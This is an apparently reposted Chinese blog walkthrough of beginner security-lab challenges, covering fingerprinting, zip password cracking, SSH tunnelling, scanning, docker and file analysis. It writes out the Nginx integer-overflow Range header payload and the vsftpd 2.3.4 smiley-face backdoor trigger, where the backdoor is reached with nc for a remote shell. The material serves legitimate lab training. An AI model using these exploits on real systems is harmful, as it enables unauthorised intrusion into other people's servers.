安鸾学院靶场——安全基础

news2024/12/25 23:30:16

文章目录

    • 1、Burp抓包
    • 2、指纹识别
    • 3、压缩包解密
    • 4、Nginx整数溢出漏洞
    • 5、PHP代码基础
    • 6、linux基础命令
    • 7、Mysql数据库基础
    • 8、目录扫描
    • 9、端口扫描
    • 10、docker容器基础
    • 11、文件类型

1、Burp抓包

抓取http://47.100.220.113:8007/的返回包,可以拿到包含flag的txt文件。
在这里插入图片描述
访问http://47.100.220.113:8007/27726623fabee80870ab072b70178308.txt,获取flag。
在这里插入图片描述

2、指纹识别

使用whatweb进行指纹识别,命令whatweb http://47.100.220.113:8109/,获取flag。
在这里插入图片描述
whatweb -v http://47.100.220.113:8109/-v查看详细信息
在这里插入图片描述

3、压缩包解密

下载提供的flag.zip和wordlist.txt,使用fcrackzip工具破解zip密码,命令:

fcrackzip -D -p Wordlist.txt -u flag.zip
# -D:代表使用字典
# -p:指定字典
# -u:只显示破解出来的密码,其他错误的密码不显示出

在这里插入图片描述

4、Nginx整数溢出漏洞

Nginx整数溢出漏洞的影响版本:Nginx 0.5.6 – 1.13.2
注意两个响应头:

X-Proxy-Cache: HIT  # 表示命中
X-Proxy-Cache: MISS # 表示未命中

漏洞利用:

range1= 17208 # 请求demo.png,返回包大小为16585,要想向前读取数据,差值最好保持在600
range2= 0×8000000000000000-17208=9,223,372,036,854,767,331
Range: -range1,-range2 # 使用负数

在这里插入图片描述

5、PHP代码基础

直接使用system函数执行系统命令
在这里插入图片描述
在这里插入图片描述

6、linux基础命令

ssh远程连接命令:

ssh <usrname>@<ip> -p <port>
ssh test@47.100.220.113 -p 2233

在这里插入图片描述
find命令查询文件:

find / -name "*flag*" -type f 2>/dev/null # 在/目录下寻找文件名为*flag*的文件,不显示报错信息
flag{82782fd75008071871ad76e3a8b8794d}

九阴真经上卷找不到,似乎被删了,只有下卷。

7、Mysql数据库基础

手工ssh隧道转发

ssh -g -f -N -L 8888:mysql:3306 test@47.100.220.113 -p 2244 # 密码为:whalwl@wuhan
# -g:此选项允许远程主机连接到本地端口转发的绑定地址上。
# -f:此选项让 SSH 在后台运行,即以守护进程模式执行。这样可以在启动 SSH 连接后立即返回到命令提示符,而不会阻塞终端。
# -N:此选项指示 SSH 不要执行任何远程命令。通常,SSH 会尝试登录到远程主机并执行指定的命令,但在此情况下,我们只需要创建端口转发而不需要远程执行命令。
# -L 8888:mysql:3306:这是端口转发的设置部分。-L 后面的参数指定了本地端口、目标主机和目标端口的对应关系。
# 在本地主机上创建一个 SSH 连接,并将本地的 8888 端口转发到远程的 MySQL 服务器的 3306 端口。

mysql -h127.0.0.1 -P8888 -utest -ptest

在这里插入图片描述

flag在whalwl数据库中。

Navicat连接
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

8、目录扫描

命令:

python dirsearch.py -u http://47.100.220.113:8008/ -w dicc.txt -e php -t 1 -m head
# -u:指定域名
# -w:指定字典
# -e:指定扫描的文件拓展名
# -t:设置线程
# -m:设置请求方式,head请求只返回响应头,没有返回内容

在这里插入图片描述

看wp是由web.zip文件的,但是这里没有,所以搞不定了。

9、端口扫描

使用nmap进行端口扫描:

nmap -p 10021 -sV 47.100.220.113
# -p:指定端口
# -sV:探测服务版本

在这里插入图片描述

vsftpd 2.3.4存在一个经典的笑脸漏洞~

笑脸漏洞原理:在vsftpd 2.3.4版本中,在登录输入用户名时输入:)类似于笑脸的符号,会导致服务处理开启6200后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。

ftp 47.100.220.113 -P 10021 # ftp连接
kali:) # 用户名
kali # 密码

nc 47.100.220.113 16200

在这里插入图片描述

10、docker容器基础

docker pull registry.cn-shanghai.aliyuncs.com/whalwl/docker_test # 拉取镜像
docker run -it registry.cn-shanghai.aliyuncs.com/whalwl/docker_test /bin/bash # 创建容器,并进入容器,退出会自动停止容器
find / -name "*fla*" -type f 2>/dev/null # 查找flag文件
cat /root/this_is_flag

在这里插入图片描述
在这里插入图片描述

11、文件类型

下载给的文件后进行解压

tar -zxvf flag.tar.gz # 解压出flag文件
file flag     # 识别file文件类型
unzip flag    # 解压,会得到五个flag文件

在这里插入图片描述

file flag-1 # 为JPEG图片文件,直接打开

在这里插入图片描述
在这里插入图片描述

file flag-2 # 为exe文件,linux下不能运行exe文件,需要放到windows下运行
# 注意改名为flag-2.exe

在这里插入图片描述

file flag-3 # 为ELF文件,linux下能直接运行
./flag-3

在这里插入图片描述

file flag-4 # 为PE32可执行文件,linux下不能直接运行,添加.exe的后缀放到windows下运行

在这里插入图片描述
添加完后,根据icon,可以看出这是一个python打包成的exe程序。python解包
在这里插入图片描述

file flag-4 # 为PE32可执行文件,linux下不能直接运行,添加.exe的后缀放到windows下运行
python pyinstxtractor.py flag-4.exe # 解包

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

file flag-5 # 为JAR文件,直接用zip解压
unzip flag-5 

在这里插入图片描述
使用jd-gui对class文件反编译
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1821006.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

buuctf----warmup_csaw_2016

进来医院先来一套常规检查 啥保护都没,看大佬说基本栈溢出 CT一看 OK cat flag 更喜欢了 40060D 找到地址 get也来了,稳啦! 0x80-0x40 8 根据上道题的exp from pwn import * ghust remote("node5.buuoj.cn",27229) addr 0x40060D payload bA * 0x40 bB*8…

SpringMVC-基础架构

一、什么是MVC 二、什么是SpringMVC 三、SpringMVC的特点 四、配置SpringMVC 简单流程&#xff1a; 总体框架 1.创建pom.xml依赖 <!--打包方式--><packaging>war</packaging><!--依赖--><dependencies><dependency><groupId>org.s…

路由器怎么设置局域网?

局域网&#xff08;Local Area Network&#xff0c;LAN&#xff09;是指在一个相对较小的地理范围内&#xff0c;如家庭、办公室或学校等&#xff0c;通过路由器等设备连接起来的计算机网络。设置局域网可以方便地实现内部资源共享和信息交流。本文将介绍如何设置局域网以及一个…

C# 设置PDF表单不可编辑、或提取PDF表单数据

PDF表单是PDF中的可编辑区域&#xff0c;允许用户填写指定信息。当表单填写完成后&#xff0c;有时候我们可能需要将其设置为不可编辑&#xff0c;以保护表单内容的完整性和可靠性。或者需要从PDF表单中提取数据以便后续处理或分析。 之前文章详细介绍过如何使用免费Spire.PDF…

晶振的匹配电容的计算

晶振 等效电路 C0是晶振的静态电容 L1是晶振的等效电感 C1是晶振的等效电容 R1是晶振的等效串联电阻 芯片内部已有反相器和负载电阻 计算公式 参考1 参考2

maven 显式依赖包包含隐式依赖包,引起依赖包冲突

问题&#xff1a;FlinkCDC 3.0.1 代码 maven依赖包冲突 什么是依赖冲突 依赖冲突是指项目依赖的某一个jar包&#xff0c;有多个不同的版本&#xff0c;因而造成类包版本冲突 依赖冲突的原因 依赖冲突很经常是类包之间的间接依赖引起的。每个显式声明的类包都会依赖于一些其它…

Mongodb在UPDATE操作中使用$push向数组中插入数据

学习mongodb&#xff0c;体会mongodb的每一个使用细节&#xff0c;欢迎阅读威赞的文章。这是威赞发布的第69篇mongodb技术文章&#xff0c;欢迎浏览本专栏威赞发布的其他文章。如果您认为我的文章对您有帮助或者解决您的问题&#xff0c;欢迎在文章下面点个赞&#xff0c;或者关…

基数排序O(n)时间复杂度的实现

基数排序O(n)时间复杂度的实现 前言 之前写过一篇文章六种常见排序算法分析与实现&#xff0c;讲了六种常见的排序算法&#xff0c;但是没有了解到桶排序&#xff0c;基数排序这两种排序算法&#xff0c;今天刷LeetCode发现了这两种算法&#xff0c;本文先来聊聊基数排序的思…

前端 CSS 经典:在 Vue3 中使用渐进式图片

1. 什么是渐进式图片 当我们网站会加载很多图片的时候&#xff0c;有些图片尺寸很大&#xff0c;加载就会很慢&#xff0c;会导致页面长时间陷入白屏状态&#xff0c;用户体验很不好。所以可以使用渐进式图片&#xff0c;先给用户展示模糊图&#xff0c;这些图尺寸小&#xff…

数据分析-Excel基础函数的使用

Excel基础函数&#xff1a; sum:求和 sumif:单条件求和 sumifs:多条件求和 subtotal:根据筛选求和 if:逻辑判断 vlookup:连接匹配数据 match:查找数值在区域中的位置 index:根据区域的位置返回数值 match、index:一起使用&#xff1a;自动根据列名查找数据 sumifs、match、ind…

k8s+RabbitMQ单机部署

1 k8s 配置文件yaml: apiVersion: apps/v1 kind: Deployment metadata:name: rabbitmq-deploynamespace: rz-dt spec:replicas: 1selector:matchLabels:app: rabbitmqtemplate:metadata:labels:app: rabbitmqspec:containers:- name: rabbitmqimage: "rz-dt-image-server…

ubtun虚拟机安装

选择镜像后启动 选择第一个回车 加载完成后 &#xff0c;进入Ubuntu安装界面&#xff0c;安装语言选择English&#xff0c;完成后按一下回车&#xff1a; 此时弹出安装器可更新提示&#xff0c;下方选项选择第二个Continue without updating&#xff08;不更新&#xff0c;继续…

计算机网络 —— 应用层(应用层概述及服务方式)

计算机网络 —— 应用层&#xff08;应用层概述及服务方式&#xff09; 应用层服务方式C/S&#xff08;客户端-服务器&#xff08;C/S&#xff09;模型&#xff09;基本概念特点B/S&#xff08;Browser/Server&#xff09;基本概念特点应用场景 p2p &#xff08;对等网络&#…

精彩回顾!安全智能体的前沿技术研究与实践

&#xff08;关注“安全极客”&#xff0c;回复“智能体”下载第一期系列专题PPT&#xff01;&#xff09; 近日&#xff0c;安全极客和Wisemodel社区联合发起并主办了“AISecurity”系列第1期&#xff1a;大模型与网络空间安全前沿探索线下活动。在这次活动中&#xff0c;云起…

Unity与Js通信交互

目录 1.Js给Unity传递消息 2.Unity给Js传递消息 简介: Unity 与 JavaScript 通信交互是指在 Unity 项目中实现与 JavaScript 代码进行数据交换和功能调用的过程。 在 Unity 中&#xff0c;可以通过特定的接口和技术来与外部的 JavaScript 环境进行连接。这使得 Unity 能够利…

机器学习:回顾总结

学了什么 进阶内容 接下来如何学习 找个项目自己练习多读前沿paper 学员分布

Adobe illustrator教程——超实用的三个进阶小技巧!

AI2024(64bit) Adobe illustrator 软件安装包下载地址&#xff1a; 百度网盘下载https://pan.baidu.com/s/1C10-2JVN1rxFF5VFRuV2Yw?pwdSIMS 01 进阶技巧1——曲率工具 基于之前的入门教程&#xff0c;大家肯定会快速想到“画笔工具”&#xff0c;但是画出来的曲线往往不够平…

k8s+pv+pvc+nas 数据持久化volumes使用

1 k8s pod申请持久化卷配置 apiVersion: v1 kind: Service metadata:name: $IMG_NAMEnamespace: rz-dtlabels:app: $IMG_NAME spec:type: NodePortports:- port: 8091nodePort: 31082 #service对外开放端口selector:app: $IMG_NAME --- apiVersion: apps/v1 kind: Deployment …

【Css】纯css展开、收起超出的文本

效果 展开 收起 未超出 码 -webkit-line-clamp: 3; 设置限制行数 <div class"wrap"> <inputtype"checkbox"id"exp-txt"><div class"text"><labelfor"exp-txt"class"btn"></label&g…

基于WPF技术的换热站智能监控系统09--封装水泵对象

1、添加用户控件 2、编写水泵UI 控件中用到了Viewbox控件&#xff0c;Viewbox控件是WPF中一个简单的缩放工具&#xff0c;它可以帮助你放大或缩小单个元素&#xff0c;同时保持其宽高比。通过样式和属性设置&#xff0c;你可以创建出既美观又功能丰富的用户界面。在实际开发中…